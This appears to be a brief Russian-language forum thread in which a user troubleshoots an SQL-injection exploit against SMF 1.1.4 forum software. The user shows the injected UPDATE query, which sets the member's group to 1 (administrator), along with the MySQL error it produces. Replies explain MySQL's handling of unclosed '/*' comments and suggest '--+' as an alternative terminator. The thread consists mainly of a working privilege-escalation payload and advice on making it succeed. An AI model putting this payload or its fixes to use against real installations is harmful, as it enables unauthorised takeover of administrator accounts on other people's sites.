Здравствуйте. Тестирую эксплоит для SMF 1.1.4 (SQL-inj) и при проведении инъекции получаю вот такой запрос.
UPDATE smf_members
SET
messageLabels = 'one',ID_GROUP=1 WHERE/*,*/ID_MEMBER=2/*'
WHERE ID_MEMBER = 2
LIMIT 1
По идее, нижний текст является закомментированным т.к. перед ним идёт /*. но MySQL выдаёт ошибку

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*'
WHERE ID_MEMBER = 2
LIMIT 1

в чём здесь проблема? Уже час не могу понять. Может дело в каких-нибудь настройках MySQL?

MySQL ругается на '/*', попробуй использовать другой комментарий в конце, например '--+', начиная с версии 5.0.51 комментарий '/*' нельзя оставлять открытым.

В версиях MySQL от 5.0.50 и 5.1.23 включительно требуется закрывать комментарий, иначе это вызовет ошибку синтаксиса.

да вот только -- как и # комментирует все до конца текущей строки, а тут многострочный запрос